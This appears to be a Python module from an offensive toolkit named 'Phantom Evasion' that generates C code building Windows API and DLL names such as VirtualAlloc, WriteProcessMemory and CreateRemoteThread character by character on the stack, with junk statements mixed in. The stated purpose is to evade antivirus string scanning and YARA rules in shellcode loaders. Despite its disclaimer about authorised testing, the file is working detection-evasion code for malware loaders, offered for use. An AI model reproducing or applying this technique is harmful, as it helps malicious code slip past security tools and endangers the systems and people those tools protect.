"""
Phantom Evasion - Stack String Construction Obfuscation

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

import re
import random
from typing import Dict, Any, List


# Strings commonly used in shellcode loaders / PE helpers
_TARGET_STRINGS: List[str] = [
    "VirtualAlloc",
    "VirtualProtect",
    "WriteProcessMemory",
    "CreateRemoteThread",
    "NtAllocateVirtualMemory",
    "NtWriteVirtualMemory",
    "NtCreateThreadEx",
    "ntdll.dll",
    "kernel32.dll",
    "LoadLibraryA",
    "GetProcAddress",
]

# Simple junk expressions inserted between character assignments to break up
# straight-line patterns that AV engines look for.
_JUNK_TEMPLATES: List[str] = [
    "    volatile int _jv{i} = {a} * {b} + {c};",
    "    (void)(sizeof(void *) + {a});",
    "    volatile long _jl{i} = {a} ^ {b};",
    "    if ({a} < 0) {{ /* unreachable */ }}",
]


def _junk_line(idx: int) -> str:
    """Return a random junk C statement."""
    tpl = random.choice(_JUNK_TEMPLATES)
    a = random.randint(1, 0xFF)
    b = random.randint(1, 0xFF)
    c = random.randint(0, 0xF)
    return tpl.format(i=idx, a=a, b=b, c=c)


def _stack_string_fn(var_name: str, s: str, junk_freq: int = 2) -> str:
    """Generate a C function that builds *s* character-by-character on the stack.

    :param var_name:  C variable name for the char array (e.g. ``s_VirtualAlloc``).
    :param s:         The plaintext string to construct.
    :param junk_freq: Insert a junk statement every *junk_freq* characters.
    :return: A C code snippet (function definition).
    """
    fn_name = f"_build_{var_name}"
    length = len(s) + 1  # +1 for NUL terminator

    lines: List[str] = []
    lines.append(f"// Stack string: \"{s}\"")
    lines.append(f"static void {fn_name}(char out[{length}]) {{")

    junk_idx = 0
    for i, ch in enumerate(s):
        lines.append(f"    out[{i}] = (char)0x{ord(ch):02x};  // '{ch}'")
        if (i + 1) % junk_freq == 0:
            lines.append(_junk_line(junk_idx))
            junk_idx += 1
    lines.append(f"    out[{len(s)}] = '\\0';")
    lines.append("}")
    return "\n".join(lines)


def generate_string_encrypt_stack() -> Dict[str, Any]:
    """Generate C code that constructs sensitive strings character-by-character.

    Instead of embedding plain-text strings in the binary (detectable by
    static scanners), each string is built at runtime by assigning one
    character at a time to a stack buffer, with junk statements interspersed.
    This breaks simple string-scanning and YARA rules that rely on the
    presence of contiguous ASCII sequences such as ``VirtualAlloc`` in the
    binary image.

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    header = """\
#ifndef __PHANTOM_STRING_ENCRYPT_STACK__
#define __PHANTOM_STRING_ENCRYPT_STACK__
// Stack String Construction – generated by Phantom Evasion
// Layer 1 – Static Evasion
// Builds sensitive strings one character at a time at runtime so they never
// appear as contiguous sequences in the binary image.

#include <stddef.h>

// Usage: declare a char array of the correct length, then call the builder.
//   char api_name[12];
//   _build_s_VirtualAlloc(api_name);
//   FARPROC fn = GetProcAddress(hKernel32, api_name);

"""

    parts = [header]
    for s in _TARGET_STRINGS:
        # Replace any character that is not alphanumeric or underscore so that
        # the resulting identifier is always a valid C variable/function name.
        safe_name = re.sub(r"[^A-Za-z0-9_]", "_", s)
        var_name = f"s_{safe_name}"
        parts.append(_stack_string_fn(var_name, s))
        parts.append("")  # blank line between functions

    parts.append("#endif /* __PHANTOM_STRING_ENCRYPT_STACK__ */")
    code = "\n".join(parts)

    return {
        "code": code,
        "description": (
            "Stack string construction: builds API names and DLL strings "
            "character-by-character at runtime with junk interspersed"
        ),
        "layer": "Layer 1 - Static Evasion",
        "name": "string_encrypt_stack",
    }
